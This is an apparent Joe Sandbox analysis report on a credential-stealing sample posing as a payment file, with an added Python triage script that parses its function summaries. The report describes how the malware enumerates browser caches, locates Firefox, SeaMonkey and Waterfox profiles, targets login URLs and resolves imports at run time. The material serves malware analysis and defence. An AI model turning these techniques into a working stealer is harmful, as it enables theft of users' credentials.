  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                          • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                          • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
APIs
• memset.MSVCRT ref: 0040A824
• GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
• wcscpy.MSVCRT ref: 0040A854
• wcscat.MSVCRT ref: 0040A86A
• LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
• LoadLibraryW.KERNEL32(?), ref: 0040A884
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: C:\Windows\system32
• API String ID: 669240632-2896066436
• Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
• Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
• Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
• Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
APIs
• memset.MSVCRT ref: 00403CBF
• memset.MSVCRT ref: 00403CD4
• memset.MSVCRT ref: 00403CE9
• memset.MSVCRT ref: 00403CFE
• memset.MSVCRT ref: 00403D13
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403DDA
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
• String ID: Waterfox$Waterfox\Profiles
• API String ID: 4039892925-11920434
• Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
• Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
• Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
• Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
APIs
• memset.MSVCRT ref: 00403E50
• memset.MSVCRT ref: 00403E65
• memset.MSVCRT ref: 00403E7A
• memset.MSVCRT ref: 00403E8F
• memset.MSVCRT ref: 00403EA4
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403F6B
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                                          • API String ID: 4039892925-2068335096
                                                                                                                                                                                                                                          • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 4039892925-3369679110
• Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
• Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
• Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
• Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
• Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 2758756878-1896041820
• Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
• Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
• Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
• Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
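Each "APIs" block in this report summarises one function: its direct and subcall API references, the string constants it touches, and the similarity hashes the IDA plugin computes over it. Read together, the blocks above describe a credential-harvesting path builder (SHGetSpecialFolderPathW with CSIDL 0x1A, which is CSIDL_APPDATA, followed by Mozilla\Firefox\Profiles or Mozilla\SeaMonkey\Profiles), a function carrying SQLite's built-in collation names and an sqlite3 error string, and, in the block that follows, a loader that builds a path from GetSystemDirectoryW, calls LoadLibraryW on it and resolves seven exports with GetProcAddress, so those imports never appear in the PE import table. The script below is an added example, not code from the Joe Sandbox report or from Joe Security: it parses this block format into records, applies tagging rules that are this example's own heuristics, and groups functions that share the API ID hash (the first half of "API String ID") to find near-duplicate copies by counting differing hex digits of "Instruction Fuzzy Hash", a positional comparison of my own and not Joe Sandbox's similarity metric. SAMPLE is a trimmed excerpt constructed from the blocks on this page.

```python
"""Triage helper for Joe Sandbox IDA-plugin function summaries.

Added example; not code from the Joe Sandbox report or from Joe Security.
Field names are the report's own; tags and nibble distance are this example's heuristics.
"""
import re
from collections import defaultdict
from itertools import combinations

# Constructed excerpt: four functions from the report, whitespace trimmed and
# most API lines dropped so the sample stays short.
SAMPLE = r"""
APIs
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
Similarity
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 4039892925-2068335096
• Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
APIs
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
Similarity
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 4039892925-3369679110
• Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Similarity
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
"""

API_RE = re.compile(
    r"^• (?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+): (?P<val>.+)$")
CSIDL_APPDATA = "0000001A"  # third argument of SHGetSpecialFolderPathW in the report


def parse_blocks(text):
    """Split the report text at each 'APIs' header; one dict per function."""
    blocks = []
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs":
            blocks.append({"apis": [], "fields": {}})
        elif blocks and (m := API_RE.match(line)):
            blocks[-1]["apis"].append({"name": m["name"], "ref": m["ref"], "subcall": m["sub"],
                                       "args": m["args"].split(",") if m["args"] else []})
        elif blocks and (m := FIELD_RE.match(line)):
            blocks[-1]["fields"][m["key"]] = m["val"]
    return blocks


def tag(block):
    """Heuristic labels for what a function does (this example's rules, not the report's)."""
    tags, apis = set(), block["apis"]
    strings = block["fields"].get("String ID", "").split("$")
    if any(s.lower().endswith("\\profiles") for s in strings):
        tags.add("browser-profile-path")
    if any(a["name"] == "SHGetSpecialFolderPathW" and a["args"][2:3] == [CSIDL_APPDATA] for a in apis):
        tags.add("appdata-lookup")  # CSIDL 0x1A resolves to %APPDATA%
    # BINARY/NOCASE/RTRIM are SQLite's built-in collations; 'no such vfs' is an sqlite3 message
    if {"BINARY", "NOCASE", "RTRIM"} <= set(strings) or any("no such vfs" in s for s in strings):
        tags.add("embedded-sqlite")
    if sum(a["name"] == "GetProcAddress" for a in apis if not a["subcall"]) >= 3 \
            and any(a["name"] == "LoadLibraryW" for a in apis):
        tags.add("runtime-import-resolution")  # resolved at run time, absent from the import table
    return tags


def nibble_distance(h1, h2):
    """Number of differing hex digits between two equal-length fuzzy hashes, else None."""
    if len(h1) != len(h2):
        return None
    return sum(a != b for a, b in zip(h1, h2))


def near_duplicates(blocks, max_distance=12):
    """Pairs of functions sharing an API ID hash whose instruction hashes differ little."""
    by_api = defaultdict(list)
    for b in blocks:
        asid, fh = b["fields"].get("API String ID"), b["fields"].get("Instruction Fuzzy Hash")
        if asid and fh:
            by_api[asid.split("-")[0]].append((b, fh))
    pairs = []
    for group in by_api.values():
        for (a, ha), (b, hb) in combinations(group, 2):
            d = nibble_distance(ha, hb)
            if d is not None and d <= max_distance:
                pairs.append((a, b, d))
    return pairs


if __name__ == "__main__":
    blocks = parse_blocks(SAMPLE)
    for b in blocks:
        print(sorted(tag(b)), "|", b["fields"].get("String ID", "<no String ID in excerpt>"))
    for a, b, d in near_duplicates(blocks):
        print(f"near-duplicate pair (nibble distance {d}): {a['fields']['String ID']} / {b['fields']['String ID']}")
```

Run on the excerpt, the two Mozilla functions land in the same API ID group and their instruction fuzzy hashes differ in nine of seventy hex digits, which is what the same path-building routine compiled once per browser with a different string constant looks like; the SQLite-string function and the GetProcAddress-heavy loader each get their own tag. The thresholds (three direct GetProcAddress calls, twelve differing nibbles) are starting points for triage, not calibrated values.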
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2941347001-0
                                                                                                                                                                                                                                          • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                                          • API String ID: 1534475566-1174173950
                                                                                                                                                                                                                                          • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                          • API String ID: 71295984-2036018995
                                                                                                                                                                                                                                          • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                          • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
